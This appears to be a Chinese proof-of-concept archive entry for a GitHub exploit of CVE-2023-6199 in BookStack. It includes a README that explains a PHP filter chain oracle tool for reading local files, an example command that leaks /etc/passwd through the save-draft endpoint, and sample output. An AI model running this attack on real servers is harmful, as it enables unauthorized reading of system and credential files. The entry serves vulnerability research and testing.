POC详情: 59ea3a10664bd81ce96c2cb3189aa889878eee6b

来源
https://github.com/AbdrrahimDahmani/php_filter_chains_oracle_exploit_for_CVE-2023-6199
关联漏洞
标题: BookStack 代码问题漏洞 (CVE-2023-6199)
描述:BookStack是BookStack公司的一个简单、自托管、易于使用的平台。用于组织和存储信息。 BookStack 23.10.2版本存在代码问题漏洞,该漏洞源于允许过滤服务器上的本地文,导致应用程序容易受到 SSRF 的攻击。
描述
A CLI to exploit parameters vulnerable to PHP filter chain error based oracle, modified to exploit CVE-2023-6199
介绍
# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read caused by the the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content!
In this case we use it to read file by exploiting an SSRF vulnerability in Book Stack version 23.10.2 identified by CVE-2023-6199, which allows filtering local files on the server

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)  
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)  
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)
文件快照

 [4.0K]  /data/pocs/59ea3a10664bd81ce96c2cb3189aa889878eee6b
├── [4.0K]  filters_chain_oracle
│   ├── [4.0K]  core
│   │   ├── [ 16K]  bruteforcer.py
│   │   ├── [6.3K]  requestor.py
│   │   ├── [ 303]  utils.py
│   │   └── [ 157]  verb.py
│   └── [4.0K]  tests
│       ├── [   0]  __init__.py
│       └── [4.7K]  test.py
├── [7.5K]  filters_chain_oracle_exploit.py
├── [ 368]  LICENSE
├── [1.7K]  README.md
└── [   9]  requirements.txt

3 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。